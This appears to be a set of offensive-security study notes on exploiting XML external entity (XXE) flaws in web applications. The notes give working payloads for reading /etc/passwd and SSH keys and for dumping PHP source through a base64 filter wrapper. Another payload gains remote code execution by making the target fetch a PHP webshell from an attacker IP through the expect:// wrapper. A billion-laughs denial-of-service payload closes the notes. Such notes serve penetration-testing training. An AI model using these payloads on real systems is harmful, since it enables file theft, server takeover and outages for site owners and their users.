Bypass XXE

Id

• see what parameter is being reflected.
  • for us its the email parameter
• note which elements are being displayed, such that we know which elements to inject into.
• In our example, the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally, so we added a new DTD before defining our entity. If the DOCTYPE was already declared in the XML request, we would just add the ENTITY element to it.
• 

Reading Sensitive Files

• /etc/passwd
• .ssh/id_rsa
• chain with File Inclusion/Directory Traversal vulnerabilities
• Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.

Reading Source Code

For php web apps:

• If we include the index.php or any other file, it doesnt work because:
• the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity
• If a file contains some of XML's special characters (e.g. </>/&), it would break the external entity reference and not be used for the reference. Furthermore, we cannot read any binary data, as it would also not conform to the XML format.
• Use php wrappers:
  • php wrappers
• base64 encoded output will not break our xml doc

  <!DOCTYPE email [
    <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
  ]>
  

Remote Code Execution

• if we can read local files:
  • try to steal ssh keys r utilize a hash stealing trick in Windows apps
• if not, for a PHP app, we can use the PHP://expect filter
• 
• Write a php webshell and start a python server
• Make the target curl/wget our php webshell.

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

• We replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
• Now we should see a request on our server once we run the xxe payload
• Note: The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.

---

Other XXE Attacks:

• SSRF to enum locally open ports and access pages that might be restricted
  
• DOS

  <?xml version="1.0"?>
  <!DOCTYPE email [
    <!ENTITY a0 "DOS" >
    <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
    <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
    <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
    <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
    <!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
    <!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
    <!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
    <!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
    <!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">        
    <!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">        
  ]>
  <root>
  <name></name>
  <tel></tel>
  <email>&a10;</email>
  <message></message>
  </root>
  

• this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference.